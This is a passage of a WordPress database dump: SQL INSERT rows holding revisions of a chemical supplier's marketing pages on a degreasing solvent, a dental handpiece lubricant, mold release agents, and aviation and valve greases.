bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon™ Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-06 02:10:36', '2016-10-06 02:10:36', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2293, 2, '2016-10-18 15:59:23', '2016-10-18 15:59:23', '<h1><span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span></h1>\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rotations per minute (RPM), these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\n\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from significant breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself, resulting in large deposit formation and a very noticeable increase in audible noise during operation.\n\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\n<h3><strong>Product Description</strong></h3>\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter while reducing costly repair intervals.\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\n\n<ul>\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\n</ul>\n[ux_product_categories ids="12" number="10"]\n\n<a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricant/">Click here</a> to find out more about these Dental Handpiece Lubricants.', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-autosave-v1', '', '', '2016-10-18 15:59:23', '2016-10-18 15:59:23', '', 1128, 'https://www.miller-stephenson.com/1128-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2294, 2, '2016-10-06 02:15:33', '2016-10-06 02:15:33', '<span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span>\r\n\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, utilizing our proprietary fluorinated synthetic lubricant delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n\r\n<strong>Product Description</strong>\r\n\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>\r\nMore about FluoroExtreme Dental Handpiece Lubricant can be found by <a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricants/">clicking this.</a>', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-10-06 02:15:33', '2016-10-06 02:15:33', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2295, 2, '2016-10-12 13:53:40', '2016-10-12 13:53:40', 'Few medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme dental lubricant is the perfect match for your dental handpiece lubricant.\n\nFluoroExtreme™ is a fluorinated synthetic dental lubricant specially designed for dental handpieces. This dental lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals. Benefits Include:\n<ul>\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation</span></li>\n 	<li class="Body P-5"><span class="C-8">Quieter operation</span></li>\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\n</ul>\nTo learn more about the case study regarding FluoroExtreme and Hydrocarbons in Dental Handpieces please <a href="https://www.miller-stephenson.com/dental-handpiece-lubricant/">click here.</a>', 'FluoroExtreme Dental Lubricant', '<p>FluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter &nbsp;while reducing costly repair intervals.</p><ul><li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li><li class="Body P-5"><span class="C-8">Reduction in debris formation</span></li><li class="Body P-5"><span class="C-8">Quieter operation</span></li><li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li><li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li></ul>', 'inherit', 'closed', 'closed', '', '474-autosave-v1', '', '', '2016-10-12 13:53:40', '2016-10-12 13:53:40', '', 474, 'https://www.miller-stephenson.com/474-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2297, 0, '2016-10-06 11:40:40', '2016-10-06 11:40:40', '', '', '', 'publish', 'closed', 'closed', '', '2297', '', '', '2016-10-06 11:40:40', '2016-10-06 11:40:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/2297/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2298, 2, '2016-11-22 14:53:45', '2016-11-22 14:53:45', '<h3>Mold Release Agents: Which is right for you?</h3>\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\n<ul>\n 	<li>Surface adhesion and durability</li>\n 	<li>Ability to form a thin-film</li>\n 	<li>Sufficient surface slip</li>\n 	<li>Chemical inertness to the molding process and molding substrate</li>\n 	<li>Number of releases per application</li>\n</ul>\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\n\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\n\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\n\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\n\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\n\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/"><strong>Thermoset polysiloxanes</strong></a>\n\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\n\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\n\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\n\n[ux_product_categories ids="21,16" number="10"]\n\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\n<h3>Technical or Application Support:</h3>\n<ul>\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-autosave-v1', '', '', '2016-11-22 14:53:45', '2016-11-22 14:53:45', '', 1525, 'https://www.miller-stephenson.com/1525-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2299, 2, '2016-10-06 12:39:29', '2016-10-06 12:39:29', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on an release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-06 12:39:29', '2016-10-06 12:39:29', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2302, 2, '2016-10-06 12:59:29', '2016-10-06 12:59:29', '<h1><span style="font-size: 100%;"><strong>Krytox Aviation Greases &amp; Applications</strong></span></h1>\r\n<h4><strong>Innovations for the Aviation Industry</strong></h4>\r\nSince the first commercial application over 50 years ago, Krytox Aviation synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox™ lubricants continue to deliver extreme performance under extreme conditions. Krytox Aviation is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n<h4><strong>Examples of Aviation-Related Applications</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-250ad/">Krytox 250AD</a> grease provides long-life, high temperature lubrication for aircraft fuel pumps, as well as helicopter hydraulic pump splines, to help prevent fretting corrosion and provide extended service life.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease has been used to extend the service life of UAV nose landing gear in harsh climates.</li>\r\n 	<li>Krytox aviation greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/agl-683/">Krytox AGL 683</a> grease provides filled-for-life performance for aircraft climate-control and nitrogen gas system valve actuator gearboxes.</li>\r\n 	<li>Krytox AGL 829 grease provides filled-for-life, flameproof performance for thrust reverser gearboxes.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is compatible and non-reactive with a broad range of O-ring materials, allowing for extended service life and ease of assembly/disassembly. In addition, many Krytox™ lubricants specially designed for aviation applications are covered by MIL-Spec PRF-26717 and <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1, approved for incidental food contact.</a></li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is used in a wide variety of airframe applications, from engine mounts to fighter canopy slide rollers to aircraft seat adjuster mechanisms.</li>\r\n 	<li>Krytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.</li>\r\n</ul>\r\n[ux_product_categories ids="86,79" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/">To learn more about these products please click here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Aviation', '', 'publish', 'closed', 'closed', '', 'krytox-aviation', '', '', '2016-10-12 19:54:36', '2016-10-12 19:54:36', '', 0, 'https://www.miller-stephenson.com/?p=2302', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2303, 2, '2016-10-06 12:57:05', '2016-10-06 12:57:05', '', 'Krytox Aviation', '', 'inherit', 'closed', 'closed', '', 'shutterstock_336329858', '', '', '2016-10-06 12:57:23', '2016-10-06 12:57:23', '', 2302, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_336329858.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2304, 2, '2016-10-06 12:59:29', '2016-10-06 12:59:29', '<span style="font-size: 120%;"><strong>Krytox Aviation Greases &amp; Applications</strong></span>\r\n\r\n<strong>Innovations for the Aviation Industry</strong>\r\n\r\nSince the first commercial application over 50 years ago, Krytox Aviation synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox™ lubricants continue to deliver extreme performance under extreme conditions. Krytox Aviation is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n\r\n<strong>Examples of Aviation-Related Applications</strong>\r\n<ul>\r\n 	<li>Krytox™ 250AD grease provides long-life, high temperature lubrication for aircraft fuel pumps, as well as helicopter hydraulic pump splines, to help prevent fretting corrosion and provide extended service life.</li>\r\n 	<li>Krytox™ 240AC grease has been used to extend the service life of UAV nose landing gear in harsh climates.</li>\r\n 	<li>Krytox™ greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.</li>\r\n 	<li>Krytox™ AGL 683 grease provides filled-for-life performance for aircraft climate-control and nitrogen gas system valve actuator gearboxes.</li>\r\n 	<li>Krytox™ AGL 829 grease provides filled-for-life, flameproof performance for thrust reverser gearboxes.</li>\r\n 	<li>Krytox™ 240AC grease is compatible and non-reactive with a broad range of O-ring materials, allowing for extended service life and ease of assembly/disassembly. In addition, many Krytox™ lubricants specially designed for aviation applications are covered by MIL-Spec PRF-26717 and NSF H-1, approved for incidental food contact.</li>\r\n 	<li>Krytox™ 240AC grease is used in a wide variety of airframe applications, from engine mounts to fighter canopy slide rollers to aircraft seat adjuster mechanisms.</li>\r\n 	<li>Krytox™ lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/">To learn more about these products please click here. </a>\r\n\r\n&nbsp;', 'Krytox Aviation', '', 'inherit', 'closed', 'closed', '', '2302-revision-v1', '', '', '2016-10-06 12:59:29', '2016-10-06 12:59:29', '', 2302, 'https://www.miller-stephenson.com/2302-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2305, 2, '2016-10-06 13:36:01', '2016-10-06 13:36:01', '<p><strong>Smooth Operation in Extreme Temperatures and Longer Use-Life Make Krytox™ Valve Lubricants the Choice for Valve Seals</strong></p>\n<p>Control valves are critical components in plant operations around the world. To optimize operational integrity, valves require proper maintenance. Long-lasting Krytox synthetic lubricants keep valves operating smoothly with less maintenance. Krytox oils and greases can also provide long-term corrosion resistance and enhanced performance, even in harsh environments, as well as extending the wear life of valve seals.<br />\nHigh lubricity, perfluoropolyether- (PFPE-) based Krytox performance lubricants are chemically compatible with all seal materials typically used in industrial applications. The remarkable characteristics of Krytox performance lubricants include:</p>\n<ul>\n<li>Compatible with most chemicals used in industrial applications</li>\n<li>Nontoxic, non-flammable</li>\n<li>Undamaged by—and non-reactive with—acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\n<li>Minimal environmental footprint—chemically and biologically inert, and silicone-free</li>\n<li>Contain no volatile organic compound (VOC) materials or chlorine</li>\n</ul>\n<p>Krytox lubricants provide smooth valve operation, less re-lubrication, and field-proven performance that can save you time and money. And, they are ideal for demanding conditions—high and low temperatures, extreme pressure, and harsh environments.</p>\n<p><strong>Examples of Valve Lubricants and Valve-Related Applications</strong></p>\n<ul>\n<li>An American electricity generating company avoided costly shutdowns due to dried-out grease in its steam turbine governor control valves when they converted to Krytox XHT-BDZ grease; the switch also improved the reliability of supply to the electric grid and enhanced the bottom line.</li>\n<li>A Korean valve manufacturer was able to reduce damage claims to its pilot-type solenoid valves by applying Krytox GPL 103 oil grade to the solenoid coil in the assembly to reduce friction and heat, and coating the spools and seals with Krytox GPL 223 grease grade to resist degradation from water and oil.</li>\n<li>A South American manufacturer of big-bore engines used Krytox XP 2C5 grease grade to lubricate its EGR valves. The special additives in Krytox XP 2C5 prevent corrosion and allow free movement of the<br />\nmetal-to-metal mechanism; the grease is inert to nitrous oxide gas and withstands temperatures up to 160 ºC (320 ºF).</li>\n<li>A French airport authority using Krytox XP 2A3 and XP 2A5 grease grades was able to achieve annual savings of €15,000 to 20,000 on the maintenance of its jet fuel pipeline by reducing scheduled maintenance to every 30 months instead of every four to six months—and unscheduled shutdowns due to valve failures were eliminated.</li>\n<li>A German manufacturer of gear-operated exhaust gas recirculation (EGR) valves for the automotive industry reduced failures due to excessive separation of grease and oil that were occurring at low temperatures and heavy vibrations. Switching to Krytox GPL 216 grease grade, the manufacturer was able to improve the reliability of its EGR valves and estimates that it is saving €80,000 ($100,000+) annually.</li>\n<li>For a steam control valve application at an Icelandic power plant, standard hydrocarbon-based grease proved unsatisfactory for lubricating bushings for valves that control the flow of high-temperature steam<br />\ncontaining corrosive geothermal gases. The optimum lubricant would need to withstand the acidic gases and have low friction for accurate control of the valve position, as well as be capable of performing in a selfgreasing system. Krytox GPL 206 grease met the challenge for lubrication of the steam valve bushing, providing the low static friction and no stick-slip that is required for accurate position control.</li>\n</ul>\n[ux_product_categories ids="46,115,45,86" number="10"]\n\n<p>To learn more about Valve Lubricants and Krytox please <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here.</a></p>\n<p>&nbsp;</p>', 'Krytox Valve Lubricants', '', 'publish', 'closed', 'closed', '', 'krytox-valve-lubricants', '', '', '2016-10-07 13:35:29', '2016-10-07 13:35:29', '', 0, 'https://www.miller-stephenson.com/?p=2305', 0, 'post', '', 0); 
